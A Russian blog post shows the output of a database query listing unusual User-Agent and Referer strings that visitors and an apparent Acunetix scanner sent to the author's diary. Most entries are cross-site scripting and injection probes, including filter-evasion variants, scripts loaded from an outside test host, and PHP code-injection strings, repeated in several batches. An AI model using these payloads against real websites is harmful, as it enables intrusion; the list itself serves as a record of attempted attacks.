логин: 
Другие записи за это число:
2011/08/01 - PHPEVAL и нечитанные заметки
<< предыдущая заметкаследующая заметка >>
01 августа 2011
прекрасное: типохаки

Посетители дневника (основного дневника, база `dnev`), чьи браузеры при написании комментариев предъявляли HTTP_USER_AGENT, скажем так, нетрадиционный.

Код в заметке:

{_PHPEVAL:
$pp=ms("SELECT `BRO` FROM `dnev`.`dnevnik_comm` WHERE `BRO` LIKE '%>%' OR `BRO` LIKE '%".e("'")."%' OR `BRO` LIKE '%".e('"')."%'");
$o=''; foreach($pp as $p) $o.='<p>'.hh($p['link']);
_}

Результаты:

&lt;marquee scrollamount="2"&gt;бЯЕ ДКЪ ОНДБНДМНЦН ОКЮБЮМХЪ: ЦХП

&lt;marquee scrollamount="2"&gt;бЯЕ ДКЪ ОНДБНДМНЦН ОКЮБЮМХЪ: ЦХП

Apache/9.0 (" '&gt;&lt;marquee&gt;; vsem privet; &lt;/marquee&gt

Mordor's Eye by Agent Smith

'); aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

Mozilla/4.0 (compatible; <i><b>xss test</b></i>; Windows NT 5.1;

Mozilla/4.0 (compatible; <i><b>xss test</b></i>; Windows NT 5.1;

'); alert('Hasta la victoria, siempre!

'); alert('Hasta la victoria, siempre!

'); alert('Hasta la victoria, siempre!

Mozilla/4.76C-SGI [ru] (X11; I; IRIX64 6.5 IP30)<iframe src="htt

%0Donload='alert(\'ула-ла\');'

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)' Embedded Web Browser from: http://bsalsa.com/; Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727) Embedded Web Browser from: http://bsalsa.com/; Embedded Web Browser from: http://bsalsa.com/; InfoPath.1; .NET CLR 2.0.50727)

Аналогично посетители, чьи браузеры предъявляли нетрадиционный HTTP_REFERER:

{_PHPEVAL:
$pp=ms("SELECT `link` FROM `dnev`.`dnevnik_link` WHERE `link` LIKE '%>%' OR `link` LIKE '%".e("'")."%' OR `link` LIKE '%".e('"')."%'");
$o=''; foreach($pp as $p) $o.='<p>'.hh($p['link']);
_}

Результаты:

123<a href="456">789</a>

123<a href="456">789</a><script>alert('EC9, O A:070;!');</script>

1<script>alert('XYU!!!');</script>

1<script>alert('XYU!!!');</script>2666

1"></a><script>alert('XYU!!!');</script>2<a>

1'></a><script>alert('XYU!!!');</script>2<a>

1'></a><script>alert('XYU!!!');</script>2<a>

1'></a><script>alert('XYU!!!');</script>2<!--

http://search.ukr.net/search.php?search_query=%D0%A4%D0%98%D0%9B%D0%AC%D0%9C+%D0%9E%D0%A0%D0%9B%D0%81%D0%9D%D0%9E%D0%9A&numdoc=10&sortby=rlv&page=1"

http://:>B;5B0.>@3" onclick="alert(1);

http://''''''''''''''''''''''''''''%20%20%20%20%20%20%20

http://''''''''''''''''''''''''''''%20%20%20%20%20%20%2045 :[email protected], 8;;8!?

http://search.ukr.net/search.php?search_query=%D1%82%D0%BE%D0%BA%D1%81%D0%B8%D1%87%D0%BD%D0%BE%D1%81%D1%82%D1%8C+%D1%81%D0%B2%D0%B8%D0%BD%D1%86%D0%B0&numdoc=10&sortby=rlv&page=4"

http://search.ukr.net/search.php?search_query=%D0%BA%D1%83%D0%BB%D0%B8%D0%BD%D0%B0%D1%80%D0%BD%D1%8B%D0%B5+%D1%80%D0%B5%D1%86%D0%B5%D0%BF%D1%82%D1%8B+%D1%81+%D1%84%D0%BE%D1%82%D0%BE&numdoc=10&sortby=rlv&page=35"

http://search.ukr.net/search.php?search_query=%D0%BF%D1%80%D0%BE%D0%B8%D0%B7%D0%B2%D0%BE%D0%B4%D1%81%D1%82%D0%B2%D0%BE+%D0%BF%D0%BE%D0%B2%D0%B0%D1%80%D0%B5%D0%BD%D0%BD%D0%BE%D0%B9+%D1%81%D0%BE%D0%BB%D0%B8&numdoc=10&sortby=rlv&page=2"

http://dirty.ru/comments/240124<DIV>вы%20уже%20купили%20соль,%20спички,%20макароны?

http://search.ukr.net/test/search.php?search_query=%D0%B8%D0%BD%D1%82%D0%B5%D1%80%D0%B5%D1%81%D0%BD%D1%8B%D0%B5+%D0%B1%D1%80%D0%BE%D1%88%D1%83%D1%80%D1%8B&numdoc=10&sortby=rlv&page=3"

[745AL <>65B 1KBL 20H0 @5:;0<0]

http://search.ukr.net/yandex/search.php?search_query=%D0%BC%D0%B0%D1%82%D0%B5%D0%BC%D0%B0%D1%82%D0%B8%D0%BA%D0%B0+%D0%B8+%D0%BF%D0%B8%D1%81%D0%B0%D1%82%D0%B5%D0%BB%D0%B8&in_found=%D0%BC%D0%B0%D1%82%D0%B5%D0%BC%D0%B0%D1%82%D0%B8%D0%BA%D0%B0+%D0%B8+%D0%BF%D0%B8%D1%81%D0%B0%D1%82%D0%B5%D0%BB%D0%B8&numdoc=10&sortby=rlv&page=1"

http://search.ukr.net/yandex/search.php?search_query=senseless-guy+&in_found=senseless-guy+&numdoc=10&sortby=rlv&page=17"

http://search.ukr.net/yandex/search.php?search_query=%D0%BE%D0%B1%D0%B8%D1%82%D0%B0%D0%B5%D0%BC%D1%8B%D0%B9+%D0%BE%D1%81%D1%82%D1%80%D0%BE%D0%B2&in_found=%D0%BE%D0%B1%D0%B8%D1%82%D0%B0%D0%B5%D0%BC%D1%8B%D0%B9+%D0%BE%D1%81%D1%82%D1%80%D0%BE%D0%B2&numdoc=10&sortby=rlv&page=2"

http://top.list.ru/counter'+

jаvаsсriрt:load_comments('<p align=justify size=1>Эта дневниковая заметка слиС?РєРѕРј старая (ей больС?Рµ 7 дней), Рё возможность оставлять комментарии автоматически отключилась. Если что-то важное, РІС‹ всегда можете написать РјРЅРµ РїРёСЃСЊРјРѕ: <a href=mailto:[email protected]>[email protected]</a></p>','2007-01-01','allrating');

jаvаsсriрt:jjote('29814','24');

http://top.list.ru/counter'+

http://counter.yadro.ru/hit?r"+

http://top.list.ru/counter'+

http://d5.ce.b0.a0.top.list.ru/counter'+

http://top.list.ru/counter'+

http://counter.yadro.ru/hit?r"+ escape(document.referrer)+((typeof(screen)=="undefined")?"": ";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth? screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+ ";"+Math.random()+

http://top.list.ru/counter'+

http://search.ukr.net/yandex/search.php?search_query=%D1%8D%D0%BA%D0%B7%D0%B0%D0%BC%D0%B5%D0%BD+%D0%B3%D0%B8%D0%B1%D0%B4%D0%B4&in_found=%D1%8D%D0%BA%D0%B7%D0%B0%D0%BC%D0%B5%D0%BD+%D0%B3%D0%B8%D0%B1%D0%B4%D0%B4&numdoc=10&sortby=rlv&page=1"

http://search.ukr.net/yandex/search.php?search_query=%D0%A1%D0%BD%D1%8F%D1%82%D1%8C+%D0%BF%D1%80%D0%B8%D1%81%D1%83%D1%85%D1%83+%D0%BF%D0%BE+%D1%84%D0%BE%D1%82%D0%BE+%D1%81%D0%B0%D0%BC%D0%BE%D0%BC%D1%83&in_found=%D0%A1%D0%BD%D1%8F%D1%82%D1%8C+%D0%BF%D1%80%D0%B8%D1%81%D1%83%D1%85%D1%83+%D0%BF%D0%BE+%D1%84%D0%BE%D1%82%D0%BE+%D1%81%D0%B0%D0%BC%D0%BE%D0%BC%D1%83&numdoc=10&sortby=rlv&page=1"

http://top.list.ru/counter'+

http://www.diary.ru/'%20+%20adserver%20+

http://iddqd.ypages.ru/advertpro/servlet/view/banner/javascr[...] Date().getTime()+

http://counter.yadro.ru/hit;dnevnik_2247000?r'+

http://yandex.ru/msearch?p=1&text=%D0%9A%D0%BE%D0%B4%D1%8B%20%D0%BC%D0%B5%D0%BB%D0%BE%D0%B4%D0%B8%D0%B9%20%D0%B4%D0%BB%D1%8F%20%D1%83%D1%81%D0%BB%D1%83%D0%B3%D0%B8%20'%D0%93%D1%83%D0%B4%D0%BE%D0%BA'.%D0%A2%D0%B5%D0%BB%D0%B52%20&s=all

http://search.ukr.net/yandex/search.php?search_query=%D1%85%D0%BE%D1%87%D1%83+%D0%B2%D0%B8%D0%B4%D0%B5%D1%82%D1%8C+%D0%B6%D0%B5%D0%BD%D1%81%D0%BA%D1%83%D1%8E+%D0%BF%D0%B8%D0%B7%D0%B4%D1%83&in_found=%D1%85%D0%BE%D1%87%D1%83+%D0%B2%D0%B8%D0%B4%D0%B5%D1%82%D1%8C+%D0%B6%D0%B5%D0%BD%D1%81%D0%BA%D1%83%D1%8E+%D0%BF%D0%B8%D0%B7%D0%B4%D1%83&in_found_win=%25F5%25EE%25F7%25F3%2B%25E2%25E8%25E4%25E5%25F2%25FC%2B%25E6%25E5%25ED%25F1%25EA%25F3%25FE%2B%25EF%25E8%25E7%25E4%25F3&numdoc=10&sortby=rlv&page=1"

http://hghltd.yandex.net/yandbtm?url=http%3A%2F%2Fwww.severouralsk.ru%2Fforum%2Findex.php%3Ftopic%3D606.15&text=GOOD'OK%20%EF%EE%E4%E0%F2%FC%20%E2%20%F1%F3%E4&qtree=AOh3tG0nD3sgq8Hm8z2OHYAS5Ge1H4mjc8i0BVfMB0Nl3o7Rcy31pgEotdJLssd2K21MWqSqXSvNsJ8FRy0MxbTyHfxEyuUNtHQRwL9n2Py355pnA2aAKt9lrW%2FaKowI2GVk4QSMkkjSf8FzeBb0oBqrzFxvYBkhoV9n6KoAenFqoTvZvzYxH8KOSsywvwpqQ4drrgw9w%2BK8l8ppPRf3kujqL7oy2yAw%2BvJJAGh7cpXZYwt6ahVgDsD2NH%2BDzjJkkDi573uDItb0DtYg1%2BY77Qel9rlBOyFpDtRmMR%2BpEg7SPEsY%2F7LIqitLqG32d5mpnBFfnECiLNhGumCPnmdLPeq6I4CD9EheJ%2B%2BK9akgo1Y4tCjwLUjwSjiDGRjWIYeXMgzCZbwTSwJBuZqZ7aywy3ff83%2Foudz1WvjmZNWVUvk18Gm39QVDwB39Melz%2BO2hPUa6WH5y2LLWoxVnIs3xzucBBu3tAxYeLtQO0yG6NOK0e3iUqIULug%2Bzhiyn9T64LQ3xvCqIeEdog6Y%2FEJ2bTo%2B7RNOwVa0geHiUMVNp1or3t2Iw%2Fyuwtj9rRCl8vqFZrFYT9HWLfG0VcF2MWMlp0R0SSzMBlAYMOhdQ%2FIrHkX1LFgNE4CEdFOZB2ojWyOQLX9EISPhgT2FbuSCTFaUREqhWFxTguaHzFGtutMLSclJqqPQQBqVlr1e7EznLcqR%2FBr8hLaVTO84HVRYiyWMR5enikYDZe1Uq

<FUUUUUUUUUUUUUUUUUUU!!>

http://search.ukr.net/yandex/search.php?search_query=%D0%B0%D0%BD%D0%B3%D0%B5%D0%BB%D1%8B+%D0%BA%D0%B0%D1%80%D1%82%D0%B8%D0%BD%D0%BA%D0%B8+%D0%BF%D1%80%D0%B0%D0%B2%D0%BE%D1%81%D0%BB%D0%B0%D0%B2%D0%B8%D0%B5&in_found=%D0%B0%D0%BD%D0%B3%D0%B5%D0%BB%D1%8B+%D0%BA%D0%B0%D1%80%D1%82%D0%B8%D0%BD%D0%BA%D0%B8+%D0%BF%D1%80%D0%B0%D0%B2%D0%BE%D1%81%D0%BB%D0%B0%D0%B2%D0%B8%D0%B5&in_found_win=%25E0%25ED%25E3%25E5%25EB%25FB%2B%25EA%25E0%25F0%25F2%25E8%25ED%25EA%25E8%2B%25EF%25F0%25E0%25E2%25EE%25F1%25EB%25E0%25E2%25E8%25E5&numdoc=10&sortby=rlv&page=1"

>"'><script>alert(‘XSS')</script>

http://yandex.ua/yandsearch?serverurl=http%3A%2F%2Flleo.aha.ru&serverurl_manually=true&text=fnjvyfz%20'ythubz&lr=187&ncrnd=3879

http://yandex.ua/yandsearch?serverurl=http%3A%2F%2Flleo.aha.ru&serverurl_manually=true&text=fnjvyfz%20'ythubz&lr=187&ncrnd=3879

http://yandex.ua/yandsearch?serverurl=http%3A%2F%2Flleo.aha.ru&serverurl_manually=true&text=fnjvyfz%20'ythubz&lr=187&ncrnd=3879

<script>alert(new Date());</script>

http://search.ukr.net/yandex/search.php?search_query=%D0%B4%D0%B2%D0%B5+%D1%80%D1%83%D0%BA%D0%B8+%D0%BA%D0%B0%D1%80%D1%82%D0%B8%D0%BD%D0%B0&in_found=%D0%B4%D0%B2%D0%B5+%D1%80%D1%83%D0%BA%D0%B8+%D0%BA%D0%B0%D1%80%D1%82%D0%B8%D0%BD%D0%B0&in_found_win=%25E4%25E2%25E5%2B%25F0%25F3%25EA%25E8%2B%25EA%25E0%25F0%25F2%25E8%25ED%25E0&numdoc=10&sortby=rlv&page=15"

http://search.ukr.net/yandex/search.php?search_query=%D0%B3%D1%80%D0%B8%D0%B1%D1%8B+%D1%81%D1%8A%D0%B5%D0%B4%D0%BE%D0%B1%D0%BD%D1%8B%D0%B5+%D1%84%D0%BE%D1%82%D0%BE&in_found=%D0%B3%D1%80%D0%B8%D0%B1%D1%8B+%D1%81%D1%8A%D0%B5%D0%B4%D0%BE%D0%B1%D0%BD%D1%8B%D0%B5+%D1%84%D0%BE%D1%82%D0%BE&in_found_win=%25E3%25F0%25E8%25E1%25FB%2B%25F1%25FA%25E5%25E4%25EE%25E1%25ED%25FB%25E5%2B%25F4%25EE%25F2%25EE&numdoc=10&sortby=rlv&page=8"

jаvаsсriрt:info_comment('41798','72')

http://lurkmore.ru/8:8B0_8E0;:>2

http://nicefaces.info/name/Natal'ya_Berezovyj.html

http://lurkmore.ru/030=>2

http://einose.ve.gp/?thendespite="pet"-names-for-guys-15

http://jbut.wettmachen.de/?peoplecreative="free-bbw-dvd"-51

http://catch.patzen.de/?directorcompany="scat-gay-tube"-13

http://mgperchq.reise.lc/?playpress="shannon-tweed"-"a-woman-scorned"-free-clip-83

http://search.ukr.net/yandex/search.php?search_query=%D0%BA%D0%BE%D0%BB%D0%BB%D0%B0%D0%B9%D0%B4%D0%B5%D1%80&in_found=%D0%BA%D0%BE%D0%BB%D0%BB%D0%B0%D0%B9%D0%B4%D0%B5%D1%80&in_found_win=%25EA%25EE%25EB%25EB%25E0%25E9%25E4%25E5%25F0&numdoc=10&sortby=rlv&page=3"

'

acunetix'"

\'

\"

1<script>alert(520689160112)</script>

1>'><ScRiPt

1>"><ScRiPt

1</textarea><ScRiPt

1</title><ScRiPt

1--><ScRiPt

<img src="JaVaS&#99;RiPt:alert(520779160112);">

1< script>alert(520999160268);</script>

1<scrip<script>t>alert(521009160268);</scrip</script>t>

1<DIV STYLE="width:expression(alert(521019160268));">

1<FRAMESET><FRAME SRC="JaVaS&#99;RiPt:alert(521029160269);"></FRAMESET>

1<img dynsrc="JaVaScRiPt:alert(521039160269);">

1<META HTTP-EQUIV="refresh" CONTENT="0;url=JaVaS&#99;RiPt:alert(521049160269);">

1<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=" invalid="521059160269">

1<embed src="http://testphp.acunetix.com/xss.swf?521069160269" type="application/x-shockwave-flash"/>

1<body onload=alert(521079160269)>

1<ScRiPt src=http://testphp.acunetix.com/xss.js?521089160269></ScRiPt>

1<script/xss src=http://testphp.acunetix.com/xss.js?521429160719></script>

1<img src=http://testphp.acunetix.com/dot.gif onload=alert(521439160719)>

1' style='background:url(JaVaScRiPt:alert(521449160719))' invalidparam='

1<ScRiPt bad=">" src="http://testphp.acunetix.com/xss.js?521469160719"></ScRiPt>

1" onmouseover=alert(521479160720)

1</div><ScRiPt

<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html;charset=UTF-7"></HEAD>+ADw-ScRiPt+AD4-alert(521499160720)+ADsAPA-/ScRiPt+AD4-

1 '"><ScRiPt

1 "'><ScRiPt

1ACUstart521789160953'";ACUend

</xss/*-*/style=xss:e/**/xpression(alert(521819160953))>

1<iframe/ /onload=alert(521969161458)></iframe>

'"

<meta http-equiv='Set-cookie' content='cookiename=cookievalue'>

\'\");|]*{

';printf(md5(acunetix_wvs_security_test));exit;//

";printf(md5(acunetix_wvs_security_test));exit;//

'

acunetix'"

\'

\"

1>'><ScRiPt

1</textarea><ScRiPt

1<script>alert(539349189623)</script>

1>"><ScRiPt

1</title><ScRiPt

1--><ScRiPt

<img src="JaVaS&#99;RiPt:alert(539439189623);">

1< script>alert(539659190021);</script>

1<scrip<script>t>alert(539669190021);</scrip</script>t>

1<DIV STYLE="width:expression(alert(539679190021));">

1<FRAMESET><FRAME SRC="JaVaS&#99;RiPt:alert(539689190021);"></FRAMESET>

1<img dynsrc="JaVaScRiPt:alert(539699190021);">

1<META HTTP-EQUIV="refresh" CONTENT="0;url=JaVaS&#99;RiPt:alert(539709190021);">

1<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=" invalid="539719190021">

1<embed src="http://testphp.acunetix.com/xss.swf?539729190021" type="application/x-shockwave-flash"/>

1<body onload=alert(539739190021)>

1<ScRiPt src=http://testphp.acunetix.com/xss.js?539749190021></ScRiPt>

1<script/xss src=http://testphp.acunetix.com/xss.js?539969190635></script>

1<img src=http://testphp.acunetix.com/dot.gif onload=alert(539979190635)>

1' style='background:url(JaVaScRiPt:alert(539989190635))' invalidparam='

1<ScRiPt bad=">" src="http://testphp.acunetix.com/xss.js?540009190635"></ScRiPt>

1" onmouseover=alert(540019190635)

1</div><ScRiPt

<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html;charset=UTF-7"></HEAD>+ADw-ScRiPt+AD4-alert(540039190635)+ADsAPA-/ScRiPt+AD4-

1 '"><ScRiPt

1 "'><ScRiPt

1ACUstart540419191570'";ACUend

</xss/*-*/style=xss:e/**/xpression(alert(540449191571))>

1<iframe/ /onload=alert(540609192235)></iframe>

'"

<meta http-equiv='Set-cookie' content='cookiename=cookievalue'>

\'\");|]*{

';printf(md5(acunetix_wvs_security_test));exit;//

";printf(md5(acunetix_wvs_security_test));exit;//

'

acunetix'"

\"

\'

1<script>alert(558219239753)</script>

1>'><ScRiPt

1>"><ScRiPt

1</textarea><ScRiPt

1</title><ScRiPt

1--><ScRiPt

<img src="JaVaS&#99;RiPt:alert(558309239753);">

1< script>alert(558539240605);</script>

1<scrip<script>t>alert(558549240605);</scrip</script>t>

1<DIV STYLE="width:expression(alert(558559240605));">

1<FRAMESET><FRAME SRC="JaVaS&#99;RiPt:alert(558569240605);"></FRAMESET>

1<img dynsrc="JaVaScRiPt:alert(558579240605);">

1<META HTTP-EQUIV="refresh" CONTENT="0;url=JaVaS&#99;RiPt:alert(558589240605);">

1<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=" invalid="558599240605">

1<embed src="http://testphp.acunetix.com/xss.swf?558609240605" type="application/x-shockwave-flash"/>

1<body onload=alert(558619240605)>

1<ScRiPt src=http://testphp.acunetix.com/xss.js?558629240605></ScRiPt>

1<script/xss src=http://testphp.acunetix.com/xss.js?558849241170></script>

1<img src=http://testphp.acunetix.com/dot.gif onload=alert(558859241170)>

1' style='background:url(JaVaScRiPt:alert(558869241170))' invalidparam='

1<ScRiPt bad=">" src="http://testphp.acunetix.com/xss.js?558889241170"></ScRiPt>

1" onmouseover=alert(558899241170)

1</div><ScRiPt

<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html;charset=UTF-7"></HEAD>+ADw-ScRiPt+AD4-alert(558919241170)+ADsAPA-/ScRiPt+AD4-

1 '"><ScRiPt

1 "'><ScRiPt

1ACUstart559209241664'";ACUend

</xss/*-*/style=xss:e/**/xpression(alert(559239241664))>

1<iframe/ /onload=alert(559309242299)></iframe>

'"

<meta http-equiv='Set-cookie' content='cookiename=cookievalue'>

\'\");|]*{

';printf(md5(acunetix_wvs_security_test));exit;//

";printf(md5(acunetix_wvs_security_test));exit;//

'

acunetix'"

\'

\"

1<script>alert(576779289603)</script>

1>'><ScRiPt

1>"><ScRiPt

1</textarea><ScRiPt

1</title><ScRiPt

1--><ScRiPt

<img src="JaVaS&#99;RiPt:alert(576869289603);">

1< script>alert(577089290097);</script>

1<scrip<script>t>alert(577099290097);</scrip</script>t>

1<DIV STYLE="width:expression(alert(577109290097));">

1<FRAMESET><FRAME SRC="JaVaS&#99;RiPt:alert(577119290097);"></FRAMESET>

1<img dynsrc="JaVaScRiPt:alert(577129290097);">

1<META HTTP-EQUIV="refresh" CONTENT="0;url=JaVaS&#99;RiPt:alert(577139290097);">

1<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=" invalid="577149290097">

1<embed src="http://testphp.acunetix.com/xss.swf?577159290097" type="application/x-shockwave-flash"/>

1<body onload=alert(577169290097)>

1<ScRiPt src=http://testphp.acunetix.com/xss.js?577179290097></ScRiPt>

1<script/xss src=http://testphp.acunetix.com/xss.js?577409290653></script>

1<img src=http://testphp.acunetix.com/dot.gif onload=alert(577419290653)>

1' style='background:url(JaVaScRiPt:alert(577429290653))' invalidparam='

1<ScRiPt bad=">" src="http://testphp.acunetix.com/xss.js?577449290653"></ScRiPt>

1" onmouseover=alert(577459290653)

1</div><ScRiPt

<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html;charset=UTF-7"></HEAD>+ADw-ScRiPt+AD4-alert(577479290653)+ADsAPA-/ScRiPt+AD4-

1 '"><ScRiPt

1 "'><ScRiPt

1ACUstart577759291224'";ACUend

</xss/*-*/style=xss:e/**/xpression(alert(577789291225))>

1<iframe/ /onload=alert(577939291817)></iframe>

'"

<meta http-equiv='Set-cookie' content='cookiename=cookievalue'>

\'\");|]*{

';printf(md5(acunetix_wvs_security_test));exit;//

";printf(md5(acunetix_wvs_security_test));exit;//

'

acunetix'"

\'

\"

1<script>alert(595439343771)</script>

1>'><ScRiPt

1>"><ScRiPt

1</textarea><ScRiPt

1</title><ScRiPt

1--><ScRiPt

<img src="JaVaS&#99;RiPt:alert(595529343771);">

1< script>alert(595749345069);</script>

1<scrip<script>t>alert(595759345069);</scrip</script>t>

1<DIV STYLE="width:expression(alert(595769345069));">

1<FRAMESET><FRAME SRC="JaVaS&#99;RiPt:alert(595779345069);"></FRAMESET>

1<img dynsrc="JaVaScRiPt:alert(595789345069);">

1<META HTTP-EQUIV="refresh" CONTENT="0;url=JaVaS&#99;RiPt:alert(595799345069);">

1<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=" invalid="595809345069">

1<embed src="http://testphp.acunetix.com/xss.swf?595819345069" type="application/x-shockwave-flash"/>

1<body onload=alert(595829345069)>

1<ScRiPt src=http://testphp.acunetix.com/xss.js?595839345069></ScRiPt>

1<script/xss src=http://testphp.acunetix.com/xss.js?596059346473></script>

1<img src=http://testphp.acunetix.com/dot.gif onload=alert(596069346473)>

1' style='background:url(JaVaScRiPt:alert(596079346473))' invalidparam='

1<ScRiPt bad=">" src="http://testphp.acunetix.com/xss.js?596099346473"></ScRiPt>

1" onmouseover=alert(596109346474)

1</div><ScRiPt

<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html;charset=UTF-7"></HEAD>+ADw-ScRiPt+AD4-alert(596129346474)+ADsAPA-/ScRiPt+AD4-

1 '"><ScRiPt

1 "'><ScRiPt

1ACUstart596419348041'";ACUend

</xss/*-*/style=xss:e/**/xpression(alert(596449348041))>

1<iframe/ /onload=alert(596599349768)></iframe>

'"

<meta http-equiv='Set-cookie' content='cookiename=cookievalue'>

\'\");|]*{

';printf(md5(acunetix_wvs_security_test));exit;//

";printf(md5(acunetix_wvs_security_test));exit;//

'

acunetix'"

\'

\"

1<script>alert(613989446576)</script>

1>'><ScRiPt

1>"><ScRiPt

1</textarea><ScRiPt

1</title><ScRiPt

1--><ScRiPt

<img src="JaVaS&#99;RiPt:alert(614079446576);">

1<scrip<script>t>alert(614309446912);</scrip</script>t>

1< script>alert(614299446912);</script>

1<DIV STYLE="width:expression(alert(614319446912));">

1<FRAMESET><FRAME SRC="JaVaS&#99;RiPt:alert(614329446912);"></FRAMESET>

1<img dynsrc="JaVaScRiPt:alert(614339446912);">

1<META HTTP-EQUIV="refresh" CONTENT="0;url=JaVaS&#99;RiPt:alert(614349446912);">

1<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=" invalid="614359446912">

1<embed src="http://testphp.acunetix.com/xss.swf?614369446912" type="application/x-shockwave-flash"/>

1<body onload=alert(614379446912)>

1<ScRiPt src=http://testphp.acunetix.com/xss.js?614389446912></ScRiPt>

1<script/xss src=http://testphp.acunetix.com/xss.js?614609447665></script>

1<img src=http://testphp.acunetix.com/dot.gif onload=alert(614619447665)>

1' style='background:url(JaVaScRiPt:alert(614629447665))' invalidparam='

1<ScRiPt bad=">" src="http://testphp.acunetix.com/xss.js?614649447665"></ScRiPt>

1" onmouseover=alert(614659447665)

1</div><ScRiPt

<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html;charset=UTF-7"></HEAD>+ADw-ScRiPt+AD4-alert(614679447665)+ADsAPA-/ScRiPt+AD4-

1 '"><ScRiPt

1 "'><ScRiPt

1ACUstart614969448241'";ACUend

</xss/*-*/style=xss:e/**/xpression(alert(614999448241))>

1<iframe/ /onload=alert(615239448722)></iframe>

'"

<meta http-equiv='Set-cookie' content='cookiename=cookievalue'>

\'\");|]*{

';printf(md5(acunetix_wvs_security_test));exit;//

";printf(md5(acunetix_wvs_security_test));exit;//

'

acunetix'"

\'

\"

1<script>alert(632649493362)</script>

1>'><ScRiPt

1>"><ScRiPt

1</textarea><ScRiPt

1</title><ScRiPt

1--><ScRiPt

<img src="JaVaS&#99;RiPt:alert(632739493362);">

1< script>alert(632959493624);</script>

1<scrip<script>t>alert(632969493624);</scrip</script>t>

1<DIV STYLE="width:expression(alert(632979493624));">

1<FRAMESET><FRAME SRC="JaVaS&#99;RiPt:alert(632989493624);"></FRAMESET>

1<img dynsrc="JaVaScRiPt:alert(632999493624);">

1<META HTTP-EQUIV="refresh" CONTENT="0;url=JaVaS&#99;RiPt:alert(633009493624);">

1<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=" invalid="633019493624">

1<embed src="http://testphp.acunetix.com/xss.swf?633029493624" type="application/x-shockwave-flash"/>

1<body onload=alert(633039493624)>

1<ScRiPt src=http://testphp.acunetix.com/xss.js?633049493624></ScRiPt>

1<script/xss src=http://testphp.acunetix.com/xss.js?633279494311></script>

1<img src=http://testphp.acunetix.com/dot.gif onload=alert(633289494311)>

1' style='background:url(JaVaScRiPt:alert(633299494311))' invalidparam='

1<ScRiPt bad=">" src="http://testphp.acunetix.com/xss.js?633319494311"></ScRiPt>

1" onmouseover=alert(633329494311)

1</div><ScRiPt

<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html;charset=UTF-7"></HEAD>+ADw-ScRiPt+AD4-alert(633349494311)+ADsAPA-/ScRiPt+AD4-

1 '"><ScRiPt

1 "'><ScRiPt

1ACUstart633629494803'";ACUend

</xss/*-*/style=xss:e/**/xpression(alert(633659494803))>

1<iframe/ /onload=alert(633899495278)></iframe>

'"

<meta http-equiv='Set-cookie' content='cookiename=cookievalue'>

\'\");|]*{

';printf(md5(acunetix_wvs_security_test));exit;//

";printf(md5(acunetix_wvs_security_test));exit;//

'

acunetix'"

\'

\"

1<script>alert(651409536948)</script>

1>'><ScRiPt

1>"><ScRiPt

1</textarea><ScRiPt

1</title><ScRiPt

1--><ScRiPt

<img src="JaVaS&#99;RiPt:alert(651499536949);">

1< script>alert(651629537389);</script>

1<scrip<script>t>alert(651639537389);</scrip</script>t>

1<DIV STYLE="width:expression(alert(651649537389));">

1<FRAMESET><FRAME SRC="JaVaS&#99;RiPt:alert(651659537389);"></FRAMESET>

1<img dynsrc="JaVaScRiPt:alert(651669537389);">

1<META HTTP-EQUIV="refresh" CONTENT="0;url=JaVaS&#99;RiPt:alert(651679537389);">

1<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=" invalid="651689537389">

1<embed src="http://testphp.acunetix.com/xss.swf?651699537389" type="application/x-shockwave-flash"/>

1<body onload=alert(651709537389)>

1<ScRiPt src=http://testphp.acunetix.com/xss.js?651719537389></ScRiPt>

1<script/xss src=http://testphp.acunetix.com/xss.js?651939537715></script>

1<img src=http://testphp.acunetix.com/dot.gif onload=alert(651949537715)>

1' style='background:url(JaVaScRiPt:alert(651959537715))' invalidparam='

1<ScRiPt bad=">" src="http://testphp.acunetix.com/xss.js?651979537716"></ScRiPt>

1" onmouseover=alert(651989537716)

1</div><ScRiPt

<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html;charset=UTF-7"></HEAD>+ADw-ScRiPt+AD4-alert(652009537716)+ADsAPA-/ScRiPt+AD4-

1 '"><ScRiPt

1 "'><ScRiPt

1ACUstart652289538162'";ACUend

</xss/*-*/style=xss:e/**/xpression(alert(652319538163))>

1<iframe/ /onload=alert(652559538766)></iframe>

'"

<meta http-equiv='Set-cookie' content='cookiename=cookievalue'>

\'\");|]*{

';printf(md5(acunetix_wvs_security_test));exit;//

";printf(md5(acunetix_wvs_security_test));exit;//

'

acunetix'"

\'

\"

